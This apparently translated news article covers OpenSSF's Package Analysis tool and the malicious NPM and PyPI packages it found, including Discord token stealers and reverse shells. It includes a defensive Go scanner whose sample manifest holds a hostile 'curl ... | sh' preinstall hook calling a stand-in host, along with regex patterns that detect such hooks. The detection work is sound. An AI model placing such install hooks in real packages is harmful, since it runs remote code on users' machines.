An analyzer has been published that revealed 200 malicious packages in NPM and PyPI

OpenSSF (Open Source Security Foundation), formed by the Linux Foundation with the aim of improving open source security, has presented the open project Package Analysis, a system still in development for analyzing packages for the presence of malicious code. The project code is written in Go and is distributed under the Apache 2.0 license. A preliminary scan of the NPM and PyPI repositories with the proposed tooling identified more than 200 malicious packages that had not been seen before.

Most of the identified problem packages either exploit name collisions with projects' internal non-public dependencies (dependency confusion attacks) or use typosquatting (choosing names similar to the names of popular libraries), and also run scripts that contact external hosts during installation. According to the Package Analysis developers, most of the identified problem packages were most likely created by security researchers taking part in bug bounty programs, since the data sent is limited to the user name and system name, and the actions are performed openly, without any attempt to hide their behaviour.

Among the packages with malicious activity noted:

  • PyPI package DiscordCMD, which was seen sending atypical requests to raw.githubusercontent.com, the Discord API and ipinfo.io. The package downloaded backdoor code from GitHub and installed it into the Discord Windows client directory, after which it searched the file system for Discord tokens and sent them to an external Discord server controlled by the attacker.
  • NPM package Colorsss, which also attempted to send Discord account tokens to an external server.
  • NPM package @roku-web-core/ajax, which during installation sent system data and launched a reverse shell that accepts external connections and runs commands.
  • PyPI package Secrevthree, which launched a reverse shell when a certain module was imported.
  • NPM package Random-Vouchercode-Generator, which after the library was imported sent a request to an external server that returned a command and the time at which it should be run.

Package Analysis works by analyzing the source code of packages for establishing network connections, accessing files and launching commands. In addition, changes in the state of packages are monitored to detect malicious insertions added in one of the releases of initially harmless software. To track the appearance of new packages in repositories and changes to previously published packages, the Package Feeds tooling is used, which unifies work with the NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crates repositories.
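The two behaviours the article describes, install-time scripts that contact external hosts and a malicious insert appearing in a later release of a previously benign package, can be illustrated with a small manifest scanner. The following is an added example, not code from the OpenSSF Package Analysis project; it is written in Go because the project itself is. It parses an NPM `package.json`, flags lifecycle hooks, external hosts referenced in them and download-and-execute pipelines, and then diffs the findings of two releases so that a hook that was quietly added in a newer version stands out. The two manifests, the package name `example-widget` and the `.invalid` hosts are constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// Constructed manifests (not real packages): a benign release and a later
// release of the same package that gained install-time hooks.
const manifestV1 = `{
  "name": "example-widget",
  "version": "1.0.0",
  "scripts": { "test": "node test.js" }
}`

const manifestV2 = `{
  "name": "example-widget",
  "version": "1.0.1",
  "scripts": {
    "test": "node test.js",
    "preinstall": "curl -s http://updates.example.invalid/setup.sh | sh",
    "postinstall": "node ./scripts/report.js https://telemetry.example.invalid/collect"
  }
}`

// Finding is one behaviour in a manifest that a reviewer should look at.
type Finding struct {
	Hook   string // lifecycle script the finding came from
	Kind   string // install-hook, external-host or download-and-execute
	Detail string // the command or the host that was matched
}

// manifest holds the subset of package.json this scanner needs.
type manifest struct {
	Name    string            `json:"name"`
	Version string            `json:"version"`
	Scripts map[string]string `json:"scripts"`
}

// Hooks that npm runs automatically during installation, in check order so
// that findings come out deterministically.
var installHooks = []string{"preinstall", "install", "postinstall", "prepare"}

var (
	// hostRe captures the host part of any http(s) URL in a command line.
	hostRe = regexp.MustCompile(`https?://([A-Za-z0-9.-]+)`)
	// pipeToShellRe matches the classic "fetch a script and pipe it to a shell" pattern.
	pipeToShellRe = regexp.MustCompile(`\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b`)
)

// AnalyzeManifest returns the findings for one package.json document.
func AnalyzeManifest(raw []byte) ([]Finding, error) {
	var m manifest
	if err := json.Unmarshal(raw, &m); err != nil {
		return nil, fmt.Errorf("parse manifest: %w", err)
	}
	var out []Finding
	for _, hook := range installHooks {
		cmd, ok := m.Scripts[hook]
		if !ok {
			continue
		}
		// Any install-time hook is worth noting: it runs without the user asking.
		out = append(out, Finding{hook, "install-hook", cmd})
		for _, match := range hostRe.FindAllStringSubmatch(cmd, -1) {
			out = append(out, Finding{hook, "external-host", match[1]})
		}
		if pipeToShellRe.MatchString(cmd) {
			out = append(out, Finding{hook, "download-and-execute", cmd})
		}
	}
	return out, nil
}

// NewFindings returns the findings present in cur that were absent in prev,
// i.e. behaviour introduced by a new release of an already published package.
func NewFindings(prev, cur []Finding) []Finding {
	seen := make(map[Finding]bool, len(prev))
	for _, f := range prev {
		seen[f] = true
	}
	var added []Finding
	for _, f := range cur {
		if !seen[f] {
			added = append(added, f)
		}
	}
	return added
}

func main() {
	v1, err := AnalyzeManifest([]byte(manifestV1))
	if err != nil {
		panic(err)
	}
	v2, err := AnalyzeManifest([]byte(manifestV2))
	if err != nil {
		panic(err)
	}
	fmt.Printf("1.0.0: %d findings, 1.0.1: %d findings\n", len(v1), len(v2))
	for _, f := range NewFindings(v1, v2) {
		fmt.Printf("new in 1.0.1: [%s] %s: %s\n", f.Hook, f.Kind, f.Detail)
	}
}
```

In practice the diff step is the useful one: a host that has always been present in a package's install script is usually a known build dependency, while a host or a `curl | sh` that first appears in a patch release is exactly the kind of change the article says Package Analysis monitors for.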

Package Analysis includes three basic components that can be used both together and separately:
